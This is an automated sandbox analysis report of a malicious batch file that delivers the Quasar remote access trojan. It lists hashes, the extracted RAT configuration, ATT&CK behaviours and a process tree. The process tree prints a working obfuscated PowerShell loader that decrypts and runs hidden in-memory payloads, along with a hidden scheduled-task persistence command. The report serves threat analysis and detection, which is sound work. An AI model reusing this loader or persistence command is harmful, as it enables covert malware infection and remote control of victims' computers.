Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-02-2025 11:23

General

  • Target

    startup_str_232.bat

  • Size

    1.8MB

  • MD5

    d7c48a5173ca5bc25644c9799109c835

  • SHA1

    8845470e96cf21d7ff11961d3dd370787960dc22

  • SHA256

    39b6ba1d146867517cb7772b4a9665bf9139319dcb9e01ebb584ddab9daf54a8

  • SHA512

    e6a9e4d84ae1609ce511ba346faac33023e5ed3217a5c082be69ef18378ae3498153659aeeb506d2100c696cb50d329e6c2c24d4233c2b1f9442a5c59293a939

  • SSDEEP

    24576:va3qjALWb5fJ3LTbHrDt9uwqPffkE8s706cW4DNTfWihRFxwVyU6fmD7+P+XbCBe:y6ALi5fdLT1qPHlovRciV+VLkrWy4hx

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

Office04

C2

127.0.0.1:4782

Mutex

504956fd-d532-425c-9e82-cbe7902cf377

Attributes
  • encryption_key

    B8B9B325A830EF659FA4EC42DB8AA956BB46428A

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\startup_str_232.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5072
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Gfr4+zeD+/eWhB2QAGtJiORh9A6UOWX3etZcAfnNQuY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z4PHG4bhLDvAXMFT9uGv8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZgiJx=New-Object System.IO.MemoryStream(,$param_var); $nEiVV=New-Object System.IO.MemoryStream; $YutHx=New-Object System.IO.Compression.GZipStream($ZgiJx, [IO.Compression.CompressionMode]::Decompress); $YutHx.CopyTo($nEiVV); $YutHx.Dispose(); $ZgiJx.Dispose(); $nEiVV.Dispose(); $nEiVV.ToArray();}function execute_function($param_var,$param2_var){ $opAvX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QPQSI=$opAvX.EntryPoint; $QPQSI.Invoke($null, $param2_var);}$knrmS = 'C:\Users\Admin\AppData\Local\Temp\startup_str_232.bat';$host.UI.RawUI.WindowTitle = $knrmS;$zAhSA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($knrmS).Split([Environment]::NewLine);foreach ($giYxD in $zAhSA) { if ($giYxD.StartsWith(':: ')) { $iOpvd=$giYxD.Substring(3); break; }}$payloads_var=[string[]]$iOpvd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_534_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_534.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3744
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_534.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2572
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_534.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3080
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Gfr4+zeD+/eWhB2QAGtJiORh9A6UOWX3etZcAfnNQuY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z4PHG4bhLDvAXMFT9uGv8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZgiJx=New-Object System.IO.MemoryStream(,$param_var); $nEiVV=New-Object System.IO.MemoryStream; $YutHx=New-Object System.IO.Compression.GZipStream($ZgiJx, [IO.Compression.CompressionMode]::Decompress); $YutHx.CopyTo($nEiVV); $YutHx.Dispose(); $ZgiJx.Dispose(); $nEiVV.Dispose(); $nEiVV.ToArray();}function execute_function($param_var,$param2_var){ $opAvX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QPQSI=$opAvX.EntryPoint; $QPQSI.Invoke($null, $param2_var);}$knrmS = 'C:\Users\Admin\AppData\Roaming\startup_str_534.bat';$host.UI.RawUI.WindowTitle = $knrmS;$zAhSA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($knrmS).Split([Environment]::NewLine);foreach ($giYxD in $zAhSA) { if ($giYxD.StartsWith(':: ')) { $iOpvd=$giYxD.Substring(3); break; }}$payloads_var=[string[]]$iOpvd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1600
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUVCMERDQ0UtQTU4NC00OEI5LUE2MzItMzAxNEQxNkEzMkZEfSIgdXNlcmlkPSJ7OEYxQzBDN0MtMUJDQy00OTBGLTkyMzEtNEQ4Mzg4NTZFMDdDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7OUUyMjkwRkItNDY5OC00M0M5LTkxRDgtMUU3RUQyQTdCQUQyfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDcxNzgiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTY4MDM3MTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDIxNjg1MjY0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:2440
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\MicrosoftEdge_X64_132.0.2957.140.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\MicrosoftEdge_X64_132.0.2957.140.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Executes dropped EXE
      • Installs/modifies Browser Helper Object
      • Drops file in Program Files directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:4572
      • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff7a320a818,0x7ff7a320a824,0x7ff7a320a830
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:4152
      • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:2396
        • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe
          "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff7a320a818,0x7ff7a320a824,0x7ff7a320a830
          4⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          PID:60
      • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff6bd2aa818,0x7ff6bd2aa824,0x7ff6bd2aa830
          4⤵
          • Executes dropped EXE
          PID:4396
      • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff6bd2aa818,0x7ff6bd2aa824,0x7ff6bd2aa830
          4⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          PID:5000
      • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff6bd2aa818,0x7ff6bd2aa824,0x7ff6bd2aa830
          4⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          PID:2860
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness
    1⤵
      PID:2252

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FDE91F2-5111-4369-9F0F-155EE6BC6DEF}\EDGEMITMP_9F903.tmp\setup.exe

      Filesize

      6.6MB

      MD5

      b4c8ad75087b8634d4f04dc6f92da9aa

      SHA1

      7efaa2472521c79d58c4ef18a258cc573704fb5d

      SHA256

      522a25568bb503cf8b44807661f31f0921dee91d37691bf399868733205690bf

      SHA512

      5094505b33a848badcffd6b3b93aad9ad73f391e201dee052376c4f8573ba351f0b8c102131216088ffb38d0ed7b5fe70ba95c3ac2c33a50c993584fe7c435e3

    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

      Filesize

      3.7MB

      MD5

      3646786aea064c0845f5bb1b8e976985

      SHA1

      a31ba2d2192898d4c0a01511395bdf87b0e53873

      SHA256

      a129a6de7b90500483226192b260eaca1ee116a007771d421aa3eee38af48d6f

      SHA512

      145f8abf2ecffd8ecc3745dbd9ab2e360826fa46d6f21dbebece7802b9b5980f4ab19e2dfd180ce0cfb84366f3ac5c87cd1b74a085e1a0dd620b6c097900e0f4

    • C:\Program Files\msedge_installer.log

      Filesize

      70KB

      MD5

      84bbb8ee54045961ff647b81e7b62d36

      SHA1

      9cd315f4d449a52279c86f66a0bbef1934595827

      SHA256

      66cfa1da731151d72b94cc172b79908e3c15be966b41beb63421680b155e3ca1

      SHA512

      4c7b2728914a1936eda5517b36ea4c5f7a3c35dd21b828c211e7746691192ec3ef089c2f2f24eb5c98366d3ffb2bc2c9f02cd1c5c15d6ab7278bc766af25edee

    • C:\Program Files\msedge_installer.log

      Filesize

      96KB

      MD5

      262facaa6ddac787b0fea5250722d19f

      SHA1

      df623c0742425b69c1104dda23a704c244d42b1e

      SHA256

      f43ff85a53dfabb51759395ce3e4fba3d9f5f75433aea3fdc84863b7494adf08

      SHA512

      f1296cbab66f59e83490b7752e30e0db5ea52877d2dd42b1a2cc6d91ceaa5d8d8a82032d8c947470a8df6cccfda530fbbfe14e247dd3fa6b6c79e7f6b82594f3

    • C:\Program Files\msedge_installer.log

      Filesize

      100KB

      MD5

      7076b1dd808b0776803108642622c820

      SHA1

      0624e9090458ad298b6b4787f2fce2db9e581e7f

      SHA256

      28da49085679d239b17dcd9f8215cc974d694dfed30dbe6d77eb9ea8c5ce6e4c

      SHA512

      231a7846f7923d33d1fb3ffaea5fc316f906931ded28cf3a7cd9c27126e9fc415461e1a3da87d727cc80670142a5b73d69fe183923b84aa33a491b1312aca805

    • C:\Program Files\msedge_installer.log

      Filesize

      101KB

      MD5

      8816f46cdbb3b66202a8b1a4d9580071

      SHA1

      867af2f985370865e72801c0e12cce2e437575b3

      SHA256

      0f57052d77e413a8ec37452c58e964a38d7201d60b3c6f2c696e8b4d9ac98d73

      SHA512

      c06244565d2b647d5eb6ef550c0fbb874e10755e9c538a427682532089453c6f803748e0aae9fbb9eb24622c340392bd3d39c7f62e4418cde91f809a925704a0

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      661739d384d9dfd807a089721202900b

      SHA1

      5b2c5d6a7122b4ce849dc98e79a7713038feac55

      SHA256

      70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

      SHA512

      81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      8cc1bac4ea343c4e9b76b3ed268773b1

      SHA1

      27a087979acd7f6fdf524f6988d1a4fe49282b7b

      SHA256

      3d86f1f7c14accd7de2e0ef60b9ef7e22abe65c694246e15fe1bf6f1d9d4fb3f

      SHA512

      0a95667472a318b56f16a765c06e6fa64ce7e69381f28ff0d3ce02411568e7f9780443d6242d246c513da74cb4b040d878bc612aac3d5b5482226c3c3d238de0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvaisu4f.guh.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\startup_str_534.bat

      Filesize

      1.8MB

      MD5

      d7c48a5173ca5bc25644c9799109c835

      SHA1

      8845470e96cf21d7ff11961d3dd370787960dc22

      SHA256

      39b6ba1d146867517cb7772b4a9665bf9139319dcb9e01ebb584ddab9daf54a8

      SHA512

      e6a9e4d84ae1609ce511ba346faac33023e5ed3217a5c082be69ef18378ae3498153659aeeb506d2100c696cb50d329e6c2c24d4233c2b1f9442a5c59293a939

    • C:\Users\Admin\AppData\Roaming\startup_str_534.vbs

      Filesize

      115B

      MD5

      360bb30336a5b49226d9c4baa5013778

      SHA1

      516b6e0a304b042d7c3d33e166d4bb8236d27cbb

      SHA256

      6b903426d215de176a4e8be2ed0891f4f3933aede3c7a5cbac5abcb6b52ce4e7

      SHA512

      979716eec9d585bb23ec641f5f34df448ff674606d0aefd73bfc69571a3b3ec33b0957276668a97060ccbb01b102be514313e248c0a292740ed14b8c9b137337

    • memory/1600-52-0x000001FA6AED0000-0x000001FA6AF82000-memory.dmp

      Filesize

      712KB

    • memory/1600-51-0x000001FA6ADC0000-0x000001FA6AE10000-memory.dmp

      Filesize

      320KB

    • memory/1600-53-0x000001FA6BCA0000-0x000001FA6BE62000-memory.dmp

      Filesize

      1.8MB

    • memory/1600-49-0x000001FA6A850000-0x000001FA6AB74000-memory.dmp

      Filesize

      3.1MB

    • memory/3068-50-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3068-0-0x00007FF997363000-0x00007FF997365000-memory.dmp

      Filesize

      8KB

    • memory/3068-14-0x0000025502470000-0x00000255025C8000-memory.dmp

      Filesize

      1.3MB

    • memory/3068-13-0x0000025502440000-0x0000025502448000-memory.dmp

      Filesize

      32KB

    • memory/3068-12-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3068-11-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3068-6-0x0000025566050000-0x0000025566072000-memory.dmp

      Filesize

      136KB

    • memory/3744-30-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3744-27-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3744-26-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3744-25-0x00007FF997360000-0x00007FF997E21000-memory.dmp

      Filesize

      10.8MB